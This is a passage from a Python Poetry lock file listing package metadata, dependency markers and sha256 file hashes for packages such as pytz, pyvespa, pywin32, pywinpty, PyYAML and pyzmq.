{file = "pytz-2023.3.post1-py2.py3-none-any.whl", hash = "sha256:ce42d816b81b68506614c11e8937d3aa9e41007ceb50bfdcb0749b921bf646c7"}, {file = "pytz-2023.3.post1.tar.gz", hash = "sha256:7b4fddbeb94a1eba4b557da24f19fdf9db575192544270a9101d8509f9f43d7b"}, ] [[package]] name = "pytz-deprecation-shim" version = "0.1.0.post0" description = "Shims to make deprecation of pytz easier" optional = true python-versions = "!=3.0.*,!=3.1.*,!=3.2.*,!=3.3.*,!=3.4.*,!=3.5.*,>=2.7" files = [ {file = "pytz_deprecation_shim-0.1.0.post0-py2.py3-none-any.whl", hash = "sha256:8314c9692a636c8eb3bda879b9f119e350e93223ae83e70e80c31675a0fdc1a6"}, {file = "pytz_deprecation_shim-0.1.0.post0.tar.gz", hash = "sha256:af097bae1b616dde5c5744441e2ddc69e74dfdcb0c263129610d85b87445a59d"}, ] [package.dependencies] "backports.zoneinfo" = {version = "*", markers = "python_version >= \"3.6\" and python_version < \"3.9\""} tzdata = {version = "*", markers = "python_version >= \"3.6\""} [[package]] name = "pyvespa" version = "0.33.0" description = "Python API for vespa.ai" optional = true python-versions = ">=3.6" files = [ {file = "pyvespa-0.33.0-py3-none-any.whl", hash = "sha256:2681910b3ac5f0259a9e41e6e2649caba2801e836b4c295cc2e48ab25b09672c"}, {file = "pyvespa-0.33.0.tar.gz", hash = "sha256:be3da9022276555b6b25c40b6e846db6e9dbf617486001ba92235ccfab6c9353"}, ] [package.dependencies] aiohttp = "*" cryptography = "*" docker = "*" jinja2 = "*" pandas = "*" requests = "*" tenacity = "*" [package.extras] full = ["keras-tuner", "onnxruntime", "tensorflow", "tensorflow-ranking", "torch (<1.13)", "transformers"] ml = ["keras-tuner", "tensorflow", "tensorflow-ranking", "torch (<1.13)", "transformers"] [[package]] name = "pywin32" 
version = "306" description = "Python for Window Extensions" optional = false python-versions = "*" files = [ {file = "pywin32-306-cp310-cp310-win32.whl", hash = "sha256:06d3420a5155ba65f0b72f2699b5bacf3109f36acbe8923765c22938a69dfc8d"}, {file = "pywin32-306-cp310-cp310-win_amd64.whl", hash = "sha256:84f4471dbca1887ea3803d8848a1616429ac94a4a8d05f4bc9c5dcfd42ca99c8"}, {file = "pywin32-306-cp311-cp311-win32.whl", hash = "sha256:e65028133d15b64d2ed8f06dd9fbc268352478d4f9289e69c190ecd6818b6407"}, {file = "pywin32-306-cp311-cp311-win_amd64.whl", hash = "sha256:a7639f51c184c0272e93f244eb24dafca9b1855707d94c192d4a0b4c01e1100e"}, {file = "pywin32-306-cp311-cp311-win_arm64.whl", hash = "sha256:70dba0c913d19f942a2db25217d9a1b726c278f483a919f1abfed79c9cf64d3a"}, {file = "pywin32-306-cp312-cp312-win32.whl", hash = "sha256:383229d515657f4e3ed1343da8be101000562bf514591ff383ae940cad65458b"}, {file = "pywin32-306-cp312-cp312-win_amd64.whl", hash = "sha256:37257794c1ad39ee9be652da0462dc2e394c8159dfd913a8a4e8eb6fd346da0e"}, {file = "pywin32-306-cp312-cp312-win_arm64.whl", hash = "sha256:5821ec52f6d321aa59e2db7e0a35b997de60c201943557d108af9d4ae1ec7040"}, {file = "pywin32-306-cp37-cp37m-win32.whl", hash = "sha256:1c73ea9a0d2283d889001998059f5eaaba3b6238f767c9cf2833b13e6a685f65"}, {file = "pywin32-306-cp37-cp37m-win_amd64.whl", hash = "sha256:72c5f621542d7bdd4fdb716227be0dd3f8565c11b280be6315b06ace35487d36"}, {file = "pywin32-306-cp38-cp38-win32.whl", hash = "sha256:e4c092e2589b5cf0d365849e73e02c391c1349958c5ac3e9d5ccb9a28e017b3a"}, {file = "pywin32-306-cp38-cp38-win_amd64.whl", hash = "sha256:e8ac1ae3601bee6ca9f7cb4b5363bf1c0badb935ef243c4733ff9a393b1690c0"}, {file = "pywin32-306-cp39-cp39-win32.whl", hash = "sha256:e25fd5b485b55ac9c057f67d94bc203f3f6595078d1fb3b458c9c28b7153a802"}, {file = "pywin32-306-cp39-cp39-win_amd64.whl", hash = "sha256:39b61c15272833b5c329a2989999dcae836b1eed650252ab1b7bfbe1d59f30f4"}, ] [[package]] name = "pywinpty" version = "2.0.12" description = "Pseudo terminal support for Windows from Python." 
optional = false python-versions = ">=3.8" files = [ {file = "pywinpty-2.0.12-cp310-none-win_amd64.whl", hash = "sha256:21319cd1d7c8844fb2c970fb3a55a3db5543f112ff9cfcd623746b9c47501575"}, {file = "pywinpty-2.0.12-cp311-none-win_amd64.whl", hash = "sha256:853985a8f48f4731a716653170cd735da36ffbdc79dcb4c7b7140bce11d8c722"}, {file = "pywinpty-2.0.12-cp312-none-win_amd64.whl", hash = "sha256:1617b729999eb6713590e17665052b1a6ae0ad76ee31e60b444147c5b6a35dca"}, {file = "pywinpty-2.0.12-cp38-none-win_amd64.whl", hash = "sha256:189380469ca143d06e19e19ff3fba0fcefe8b4a8cc942140a6b863aed7eebb2d"}, {file = "pywinpty-2.0.12-cp39-none-win_amd64.whl", hash = "sha256:7520575b6546db23e693cbd865db2764097bd6d4ef5dc18c92555904cd62c3d4"}, {file = "pywinpty-2.0.12.tar.gz", hash = "sha256:8197de460ae8ebb7f5d1701dfa1b5df45b157bb832e92acba316305e18ca00dd"}, ] [[package]] name = "pyyaml" version = "6.0.1" description = "YAML parser and emitter for Python" optional = false python-versions = ">=3.6" files = [ {file = "PyYAML-6.0.1-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:d858aa552c999bc8a8d57426ed01e40bef403cd8ccdd0fc5f6f04a00414cac2a"}, {file = "PyYAML-6.0.1-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:fd66fc5d0da6d9815ba2cebeb4205f95818ff4b79c3ebe268e75d961704af52f"}, {file = "PyYAML-6.0.1-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:69b023b2b4daa7548bcfbd4aa3da05b3a74b772db9e23b982788168117739938"}, {file = "PyYAML-6.0.1-cp310-cp310-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:81e0b275a9ecc9c0c0c07b4b90ba548307583c125f54d5b6946cfee6360c733d"}, {file = "PyYAML-6.0.1-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:ba336e390cd8e4d1739f42dfe9bb83a3cc2e80f567d8805e11b46f4a943f5515"}, {file = "PyYAML-6.0.1-cp310-cp310-musllinux_1_1_x86_64.whl", hash = "sha256:326c013efe8048858a6d312ddd31d56e468118ad4cdeda36c719bf5bb6192290"}, {file = "PyYAML-6.0.1-cp310-cp310-win32.whl", hash = "sha256:bd4af7373a854424dabd882decdc5579653d7868b8fb26dc7d0e99f823aa5924"}, {file = "PyYAML-6.0.1-cp310-cp310-win_amd64.whl", hash = "sha256:fd1592b3fdf65fff2ad0004b5e363300ef59ced41c2e6b3a99d4089fa8c5435d"}, {file = "PyYAML-6.0.1-cp311-cp311-macosx_10_9_x86_64.whl", hash = "sha256:6965a7bc3cf88e5a1c3bd2e0b5c22f8d677dc88a455344035f03399034eb3007"}, {file = "PyYAML-6.0.1-cp311-cp311-macosx_11_0_arm64.whl", hash = "sha256:f003ed9ad21d6a4713f0a9b5a7a0a79e08dd0f221aff4525a2be4c346ee60aab"}, {file = "PyYAML-6.0.1-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:42f8152b8dbc4fe7d96729ec2b99c7097d656dc1213a3229ca5383f973a5ed6d"}, {file = "PyYAML-6.0.1-cp311-cp311-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:062582fca9fabdd2c8b54a3ef1c978d786e0f6b3a1510e0ac93ef59e0ddae2bc"}, {file = "PyYAML-6.0.1-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:d2b04aac4d386b172d5b9692e2d2da8de7bfb6c387fa4f801fbf6fb2e6ba4673"}, {file = "PyYAML-6.0.1-cp311-cp311-musllinux_1_1_x86_64.whl", hash = "sha256:e7d73685e87afe9f3b36c799222440d6cf362062f78be1013661b00c5c6f678b"}, {file = "PyYAML-6.0.1-cp311-cp311-win32.whl", hash = "sha256:1635fd110e8d85d55237ab316b5b011de701ea0f29d07611174a1b42f1444741"}, {file = "PyYAML-6.0.1-cp311-cp311-win_amd64.whl", hash = "sha256:bf07ee2fef7014951eeb99f56f39c9bb4af143d8aa3c21b1677805985307da34"}, {file = "PyYAML-6.0.1-cp312-cp312-macosx_10_9_x86_64.whl", hash = "sha256:855fb52b0dc35af121542a76b9a84f8d1cd886ea97c84703eaa6d88e37a2ad28"}, {file = 
"PyYAML-6.0.1-cp312-cp312-macosx_11_0_arm64.whl", hash = "sha256:40df9b996c2b73138957fe23a16a4f0ba614f4c0efce1e9406a184b6d07fa3a9"}, {file = "PyYAML-6.0.1-cp312-cp312-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:6c22bec3fbe2524cde73d7ada88f6566758a8f7227bfbf93a408a9d86bcc12a0"}, {file = "PyYAML-6.0.1-cp312-cp312-musllinux_1_1_x86_64.whl", hash = "sha256:8d4e9c88387b0f5c7d5f281e55304de64cf7f9c0021a3525bd3b1c542da3b0e4"}, {file = "PyYAML-6.0.1-cp312-cp312-win32.whl", hash = "sha256:d483d2cdf104e7c9fa60c544d92981f12ad66a457afae824d146093b8c294c54"}, {file = "PyYAML-6.0.1-cp312-cp312-win_amd64.whl", hash = "sha256:0d3304d8c0adc42be59c5f8a4d9e3d7379e6955ad754aa9d6ab7a398b59dd1df"}, {file = "PyYAML-6.0.1-cp36-cp36m-macosx_10_9_x86_64.whl", hash = "sha256:50550eb667afee136e9a77d6dc71ae76a44df8b3e51e41b77f6de2932bfe0f47"}, {file = "PyYAML-6.0.1-cp36-cp36m-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:1fe35611261b29bd1de0070f0b2f47cb6ff71fa6595c077e42bd0c419fa27b98"}, {file = "PyYAML-6.0.1-cp36-cp36m-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:704219a11b772aea0d8ecd7058d0082713c3562b4e271b849ad7dc4a5c90c13c"}, {file = "PyYAML-6.0.1-cp36-cp36m-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:afd7e57eddb1a54f0f1a974bc4391af8bcce0b444685d936840f125cf046d5bd"}, {file = "PyYAML-6.0.1-cp36-cp36m-win32.whl", hash = "sha256:fca0e3a251908a499833aa292323f32437106001d436eca0e6e7833256674585"}, {file = "PyYAML-6.0.1-cp36-cp36m-win_amd64.whl", hash = "sha256:f22ac1c3cac4dbc50079e965eba2c1058622631e526bd9afd45fedd49ba781fa"}, {file = "PyYAML-6.0.1-cp37-cp37m-macosx_10_9_x86_64.whl", hash = "sha256:b1275ad35a5d18c62a7220633c913e1b42d44b46ee12554e5fd39c70a243d6a3"}, {file = "PyYAML-6.0.1-cp37-cp37m-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:18aeb1bf9a78867dc38b259769503436b7c72f7a1f1f4c93ff9a17de54319b27"}, {file = "PyYAML-6.0.1-cp37-cp37m-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:596106435fa6ad000c2991a98fa58eeb8656ef2325d7e158344fb33864ed87e3"}, {file = "PyYAML-6.0.1-cp37-cp37m-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:baa90d3f661d43131ca170712d903e6295d1f7a0f595074f151c0aed377c9b9c"}, {file = "PyYAML-6.0.1-cp37-cp37m-win32.whl", hash = "sha256:9046c58c4395dff28dd494285c82ba00b546adfc7ef001486fbf0324bc174fba"}, {file = "PyYAML-6.0.1-cp37-cp37m-win_amd64.whl", hash = "sha256:4fb147e7a67ef577a588a0e2c17b6db51dda102c71de36f8549b6816a96e1867"}, {file = "PyYAML-6.0.1-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:1d4c7e777c441b20e32f52bd377e0c409713e8bb1386e1099c2415f26e479595"}, {file = "PyYAML-6.0.1-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:a0cd17c15d3bb3fa06978b4e8958dcdc6e0174ccea823003a106c7d4d7899ac5"}, {file = "PyYAML-6.0.1-cp38-cp38-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:28c119d996beec18c05208a8bd78cbe4007878c6dd15091efb73a30e90539696"}, {file = "PyYAML-6.0.1-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:7e07cbde391ba96ab58e532ff4803f79c4129397514e1413a7dc761ccd755735"}, {file = "PyYAML-6.0.1-cp38-cp38-musllinux_1_1_x86_64.whl", hash = "sha256:49a183be227561de579b4a36efbb21b3eab9651dd81b1858589f796549873dd6"}, {file = "PyYAML-6.0.1-cp38-cp38-win32.whl", hash = "sha256:184c5108a2aca3c5b3d3bf9395d50893a7ab82a38004c8f61c258d4428e80206"}, {file = "PyYAML-6.0.1-cp38-cp38-win_amd64.whl", hash = "sha256:1e2722cc9fbb45d9b87631ac70924c11d3a401b2d7f410cc0e3bbf249f2dca62"}, {file = 
"PyYAML-6.0.1-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:9eb6caa9a297fc2c2fb8862bc5370d0303ddba53ba97e71f08023b6cd73d16a8"}, {file = "PyYAML-6.0.1-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:c8098ddcc2a85b61647b2590f825f3db38891662cfc2fc776415143f599bb859"}, {file = "PyYAML-6.0.1-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:5773183b6446b2c99bb77e77595dd486303b4faab2b086e7b17bc6bef28865f6"}, {file = "PyYAML-6.0.1-cp39-cp39-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:b786eecbdf8499b9ca1d697215862083bd6d2a99965554781d0d8d1ad31e13a0"}, {file = "PyYAML-6.0.1-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:bc1bf2925a1ecd43da378f4db9e4f799775d6367bdb94671027b73b393a7c42c"}, {file = "PyYAML-6.0.1-cp39-cp39-musllinux_1_1_x86_64.whl", hash = "sha256:04ac92ad1925b2cff1db0cfebffb6ffc43457495c9b3c39d3fcae417d7125dc5"}, {file = "PyYAML-6.0.1-cp39-cp39-win32.whl", hash = "sha256:faca3bdcf85b2fc05d06ff3fbc1f83e1391b3e724afa3feba7d13eeab355484c"}, {file = "PyYAML-6.0.1-cp39-cp39-win_amd64.whl", hash = "sha256:510c9deebc5c0225e8c96813043e62b680ba2f9c50a08d3724c7f28a747d1486"}, {file = "PyYAML-6.0.1.tar.gz", hash = "sha256:bfdf460b1736c775f2ba9f6a92bca30bc2095067b8a9d77876d1fad6cc3b4a43"}, ] [[package]] name = "pyzmq" version = "25.1.1" description = "Python bindings for 0MQ" optional = false python-versions = ">=3.6" files = [ {file = "pyzmq-25.1.1-cp310-cp310-macosx_10_15_universal2.whl", hash = "sha256:381469297409c5adf9a0e884c5eb5186ed33137badcbbb0560b86e910a2f1e76"}, {file = "pyzmq-25.1.1-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:955215ed0604dac5b01907424dfa28b40f2b2292d6493445dd34d0dfa72586a8"}, {file = "pyzmq-25.1.1-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:985bbb1316192b98f32e25e7b9958088431d853ac63aca1d2c236f40afb17c83"}, {file = "pyzmq-25.1.1-cp310-cp310-manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:afea96f64efa98df4da6958bae37f1cbea7932c35878b185e5982821bc883369"}, {file = "pyzmq-25.1.1-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:76705c9325d72a81155bb6ab48d4312e0032bf045fb0754889133200f7a0d849"}, {file = "pyzmq-25.1.1-cp310-cp310-manylinux_2_28_x86_64.whl", hash = "sha256:77a41c26205d2353a4c94d02be51d6cbdf63c06fbc1295ea57dad7e2d3381b71"}, {file = "pyzmq-25.1.1-cp310-cp310-musllinux_1_1_aarch64.whl", hash = "sha256:12720a53e61c3b99d87262294e2b375c915fea93c31fc2336898c26d7aed34cd"}, {file = "pyzmq-25.1.1-cp310-cp310-musllinux_1_1_i686.whl", hash = "sha256:57459b68e5cd85b0be8184382cefd91959cafe79ae019e6b1ae6e2ba8a12cda7"}, {file = "pyzmq-25.1.1-cp310-cp310-musllinux_1_1_x86_64.whl", hash = "sha256:292fe3fc5ad4a75bc8df0dfaee7d0babe8b1f4ceb596437213821f761b4589f9"}, {file = "pyzmq-25.1.1-cp310-cp310-win32.whl", hash = "sha256:35b5ab8c28978fbbb86ea54958cd89f5176ce747c1fb3d87356cf698048a7790"}, {file = "pyzmq-25.1.1-cp310-cp310-win_amd64.whl", hash = "sha256:11baebdd5fc5b475d484195e49bae2dc64b94a5208f7c89954e9e354fc609d8f"}, {file = "pyzmq-25.1.1-cp311-cp311-macosx_10_15_universal2.whl", hash = "sha256:d20a0ddb3e989e8807d83225a27e5c2eb2260eaa851532086e9e0fa0d5287d83"}, {file = "pyzmq-25.1.1-cp311-cp311-macosx_10_9_x86_64.whl", hash = "sha256:e1c1be77bc5fb77d923850f82e55a928f8638f64a61f00ff18a67c7404faf008"}, {file = "pyzmq-25.1.1-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:d89528b4943d27029a2818f847c10c2cecc79fa9590f3cb1860459a5be7933eb"}, {file = 
"pyzmq-25.1.1-cp311-cp311-manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:90f26dc6d5f241ba358bef79be9ce06de58d477ca8485e3291675436d3827cf8"}, {file = "pyzmq-25.1.1-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:c2b92812bd214018e50b6380ea3ac0c8bb01ac07fcc14c5f86a5bb25e74026e9"}, {file = "pyzmq-25.1.1-cp311-cp311-manylinux_2_28_x86_64.whl", hash = "sha256:2f957ce63d13c28730f7fd6b72333814221c84ca2421298f66e5143f81c9f91f"}, {file = "pyzmq-25.1.1-cp311-cp311-musllinux_1_1_aarch64.whl", hash = "sha256:047a640f5c9c6ade7b1cc6680a0e28c9dd5a0825135acbd3569cc96ea00b2505"}, {file = "pyzmq-25.1.1-cp311-cp311-musllinux_1_1_i686.whl", hash = "sha256:7f7e58effd14b641c5e4dec8c7dab02fb67a13df90329e61c869b9cc607ef752"}, {file = "pyzmq-25.1.1-cp311-cp311-musllinux_1_1_x86_64.whl", hash = "sha256:c2910967e6ab16bf6fbeb1f771c89a7050947221ae12a5b0b60f3bca2ee19bca"}, {file = "pyzmq-25.1.1-cp311-cp311-win32.whl", hash = "sha256:76c1c8efb3ca3a1818b837aea423ff8a07bbf7aafe9f2f6582b61a0458b1a329"}, {file = "pyzmq-25.1.1-cp311-cp311-win_amd64.whl", hash = "sha256:44e58a0554b21fc662f2712814a746635ed668d0fbc98b7cb9d74cb798d202e6"}, {file = "pyzmq-25.1.1-cp312-cp312-macosx_10_15_universal2.whl", hash = "sha256:e1ffa1c924e8c72778b9ccd386a7067cddf626884fd8277f503c48bb5f51c762"}, {file = "pyzmq-25.1.1-cp312-cp312-macosx_10_9_x86_64.whl", hash = "sha256:1af379b33ef33757224da93e9da62e6471cf4a66d10078cf32bae8127d3d0d4a"}, {file = "pyzmq-25.1.1-cp312-cp312-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:cff084c6933680d1f8b2f3b4ff5bbb88538a4aac00d199ac13f49d0698727ecb"}, {file = "pyzmq-25.1.1-cp312-cp312-manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:e2400a94f7dd9cb20cd012951a0cbf8249e3d554c63a9c0cdfd5cbb6c01d2dec"}, {file = "pyzmq-25.1.1-cp312-cp312-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:2d81f1ddae3858b8299d1da72dd7d19dd36aab654c19671aa8a7e7fb02f6638a"}, {file = "pyzmq-25.1.1-cp312-cp312-manylinux_2_28_x86_64.whl", hash = "sha256:255ca2b219f9e5a3a9ef3081512e1358bd4760ce77828e1028b818ff5610b87b"}, {file = "pyzmq-25.1.1-cp312-cp312-musllinux_1_1_aarch64.whl", hash = "sha256:a882ac0a351288dd18ecae3326b8a49d10c61a68b01419f3a0b9a306190baf69"}, {file = "pyzmq-25.1.1-cp312-cp312-musllinux_1_1_i686.whl", hash = "sha256:724c292bb26365659fc434e9567b3f1adbdb5e8d640c936ed901f49e03e5d32e"}, {file = "pyzmq-25.1.1-cp312-cp312-musllinux_1_1_x86_64.whl", hash = "sha256:4ca1ed0bb2d850aa8471387882247c68f1e62a4af0ce9c8a1dbe0d2bf69e41fb"}, {file = "pyzmq-25.1.1-cp312-cp312-win32.whl", hash = "sha256:b3451108ab861040754fa5208bca4a5496c65875710f76789a9ad27c801a0075"}, {file = "pyzmq-25.1.1-cp312-cp312-win_amd64.whl", hash = "sha256:eadbefd5e92ef8a345f0525b5cfd01cf4e4cc651a2cffb8f23c0dd184975d787"}, {file = "pyzmq-25.1.1-cp36-cp36m-macosx_10_9_x86_64.whl", hash = "sha256:db0b2af416ba735c6304c47f75d348f498b92952f5e3e8bff449336d2728795d"}, {file = "pyzmq-25.1.1-cp36-cp36m-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:c7c133e93b405eb0d36fa430c94185bdd13c36204a8635470cccc200723c13bb"}, {file = "pyzmq-25.1.1-cp36-cp36m-manylinux_2_5_i686.manylinux1_i686.whl", hash = "sha256:273bc3959bcbff3f48606b28229b4721716598d76b5aaea2b4a9d0ab454ec062"}, {file = "pyzmq-25.1.1-cp36-cp36m-manylinux_2_5_x86_64.manylinux1_x86_64.whl", hash = "sha256:cbc8df5c6a88ba5ae385d8930da02201165408dde8d8322072e3e5ddd4f68e22"}, {file = "pyzmq-25.1.1-cp36-cp36m-musllinux_1_1_aarch64.whl", hash = "sha256:18d43df3f2302d836f2a56f17e5663e398416e9dd74b205b179065e61f1a6edf"}, 
{file = "pyzmq-25.1.1-cp36-cp36m-musllinux_1_1_i686.whl", hash = "sha256:73461eed88a88c866656e08f89299720a38cb4e9d34ae6bf5df6f71102570f2e"}, {file = "pyzmq-25.1.1-cp36-cp36m-musllinux_1_1_x86_64.whl", hash = "sha256:34c850ce7976d19ebe7b9d4b9bb8c9dfc7aac336c0958e2651b88cbd46682123"}, {file = "pyzmq-25.1.1-cp36-cp36m-win32.whl", hash = "sha256:d2045d6d9439a0078f2a34b57c7b18c4a6aef0bee37f22e4ec9f32456c852c71"}, {file = "pyzmq-25.1.1-cp36-cp36m-win_amd64.whl", hash = "sha256:458dea649f2f02a0b244ae6aef8dc29325a2810aa26b07af8374dc2a9faf57e3"}, {file = "pyzmq-25.1.1-cp37-cp37m-macosx_10_9_x86_64.whl", hash = "sha256:7cff25c5b315e63b07a36f0c2bab32c58eafbe57d0dce61b614ef4c76058c115"}, {file = "pyzmq-25.1.1-cp37-cp37m-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:b1579413ae492b05de5a6174574f8c44c2b9b122a42015c5292afa4be2507f28"}, {file = "pyzmq-25.1.1-cp37-cp37m-manylinux_2_5_i686.manylinux1_i686.whl", hash = "sha256:3d0a409d3b28607cc427aa5c30a6f1e4452cc44e311f843e05edb28ab5e36da0"}, {file = "pyzmq-25.1.1-cp37-cp37m-manylinux_2_5_x86_64.manylinux1_x86_64.whl", hash = "sha256:21eb4e609a154a57c520e3d5bfa0d97e49b6872ea057b7c85257b11e78068222"}, {file = "pyzmq-25.1.1-cp37-cp37m-musllinux_1_1_aarch64.whl", hash = "sha256:034239843541ef7a1aee0c7b2cb7f6aafffb005ede965ae9cbd49d5ff4ff73cf"}, {file = "pyzmq-25.1.1-cp37-cp37m-musllinux_1_1_i686.whl", hash = "sha256:f8115e303280ba09f3898194791a153862cbf9eef722ad8f7f741987ee2a97c7"}, {file = "pyzmq-25.1.1-cp37-cp37m-musllinux_1_1_x86_64.whl", hash = "sha256:1a5d26fe8f32f137e784f768143728438877d69a586ddeaad898558dc971a5ae"}, {file = "pyzmq-25.1.1-cp37-cp37m-win32.whl", hash = "sha256:f32260e556a983bc5c7ed588d04c942c9a8f9c2e99213fec11a031e316874c7e"}, {file = "pyzmq-25.1.1-cp37-cp37m-win_amd64.whl", hash = "sha256:abf34e43c531bbb510ae7e8f5b2b1f2a8ab93219510e2b287a944432fad135f3"}, {file = "pyzmq-25.1.1-cp38-cp38-macosx_10_15_universal2.whl", hash = "sha256:87e34f31ca8f168c56d6fbf99692cc8d3b445abb5bfd08c229ae992d7547a92a"}, {file = "pyzmq-25.1.1-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:c9c6c9b2c2f80747a98f34ef491c4d7b1a8d4853937bb1492774992a120f475d"}, {file = "pyzmq-25.1.1-cp38-cp38-manylinux_2_12_i686.manylinux2010_i686.whl", hash = "sha256:5619f3f5a4db5dbb572b095ea3cb5cc035335159d9da950830c9c4db2fbb6995"}, {file = "pyzmq-25.1.1-cp38-cp38-manylinux_2_12_x86_64.manylinux2010_x86_64.whl", hash = "sha256:5a34d2395073ef862b4032343cf0c32a712f3ab49d7ec4f42c9661e0294d106f"}, {file = "pyzmq-25.1.1-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:25f0e6b78220aba09815cd1f3a32b9c7cb3e02cb846d1cfc526b6595f6046618"}, {file = "pyzmq-25.1.1-cp38-cp38-musllinux_1_1_aarch64.whl", hash = "sha256:3669cf8ee3520c2f13b2e0351c41fea919852b220988d2049249db10046a7afb"}, {file = "pyzmq-25.1.1-cp38-cp38-musllinux_1_1_i686.whl", hash = "sha256:2d163a18819277e49911f7461567bda923461c50b19d169a062536fffe7cd9d2"}, {file = "pyzmq-25.1.1-cp38-cp38-musllinux_1_1_x86_64.whl", hash = "sha256:df27ffddff4190667d40de7beba4a950b5ce78fe28a7dcc41d6f8a700a80a3c0"}, {file = "pyzmq-25.1.1-cp38-cp38-win32.whl", hash = "sha256:a382372898a07479bd34bda781008e4a954ed8750f17891e794521c3e21c2e1c"}, {file = "pyzmq-25.1.1-cp38-cp38-win_amd64.whl", hash = "sha256:52533489f28d62eb1258a965f2aba28a82aa747202c8fa5a1c7a43b5db0e85c1"}, {file = "pyzmq-25.1.1-cp39-cp39-macosx_10_15_universal2.whl", hash = "sha256:03b3f49b57264909aacd0741892f2aecf2f51fb053e7d8ac6767f6c700832f45"}, {file = "pyzmq-25.1.1-cp39-cp39-macosx_10_9_x86_64.whl", hash = 
"sha256:330f9e188d0d89080cde66dc7470f57d1926ff2fb5576227f14d5be7ab30b9fa"}, {file = "pyzmq-25.1.1-cp39-cp39-manylinux_2_12_i686.manylinux2010_i686.whl", hash = "sha256:2ca57a5be0389f2a65e6d3bb2962a971688cbdd30b4c0bd188c99e39c234f414"}, {file = "pyzmq-25.1.1-cp39-cp39-manylinux_2_12_x86_64.manylinux2010_x86_64.whl", hash = "sha256:d457aed310f2670f59cc5b57dcfced452aeeed77f9da2b9763616bd57e4dbaae"}, {file = "pyzmq-25.1.1-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:c56d748ea50215abef7030c72b60dd723ed5b5c7e65e7bc2504e77843631c1a6"}, {file = "pyzmq-25.1.1-cp39-cp39-musllinux_1_1_aarch64.whl", hash = "sha256:8f03d3f0d01cb5a018debeb412441996a517b11c5c17ab2001aa0597c6d6882c"}, {file = "pyzmq-25.1.1-cp39-cp39-musllinux_1_1_i686.whl", hash = "sha256:820c4a08195a681252f46926de10e29b6bbf3e17b30037bd4250d72dd3ddaab8"}, {file = "pyzmq-25.1.1-cp39-cp39-musllinux_1_1_x86_64.whl", hash = "sha256:17ef5f01d25b67ca8f98120d5fa1d21efe9611604e8eb03a5147360f517dd1e2"}, {file = "pyzmq-25.1.1-cp39-cp39-win32.whl", hash = "sha256:04ccbed567171579ec2cebb9c8a3e30801723c575601f9a990ab25bcac6b51e2"}, {file = "pyzmq-25.1.1-cp39-cp39-win_amd64.whl", hash = "sha256:e61f091c3ba0c3578411ef505992d356a812fb200643eab27f4f70eed34a29ef"}, {file = "pyzmq-25.1.1-pp310-pypy310_pp73-macosx_10_9_x86_64.whl", hash = "sha256:ade6d25bb29c4555d718ac6d1443a7386595528c33d6b133b258f65f963bb0f6"}, {file = "pyzmq-25.1.1-pp310-pypy310_pp73-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:e0c95ddd4f6e9fca4e9e3afaa4f9df8552f0ba5d1004e89ef0a68e1f1f9807c7"}, {file = "pyzmq-25.1.1-pp310-pypy310_pp73-manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:48e466162a24daf86f6b5ca72444d2bf39a5e58da5f96370078be67c67adc978"}, {file = "pyzmq-25.1.1-pp310-pypy310_pp73-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:abc719161780932c4e11aaebb203be3d6acc6b38d2f26c0f523b5b59d2fc1996"}, {file = "pyzmq-25.1.1-pp310-pypy310_pp73-win_amd64.whl", hash = "sha256:1ccf825981640b8c34ae54231b7ed00271822ea1c6d8ba1090ebd4943759abf5"}, {file = "pyzmq-25.1.1-pp37-pypy37_pp73-macosx_10_9_x86_64.whl", hash = "sha256:c2f20ce161ebdb0091a10c9ca0372e023ce24980d0e1f810f519da6f79c60800"}, {file = "pyzmq-25.1.1-pp37-pypy37_pp73-manylinux_2_12_i686.manylinux2010_i686.whl", hash = 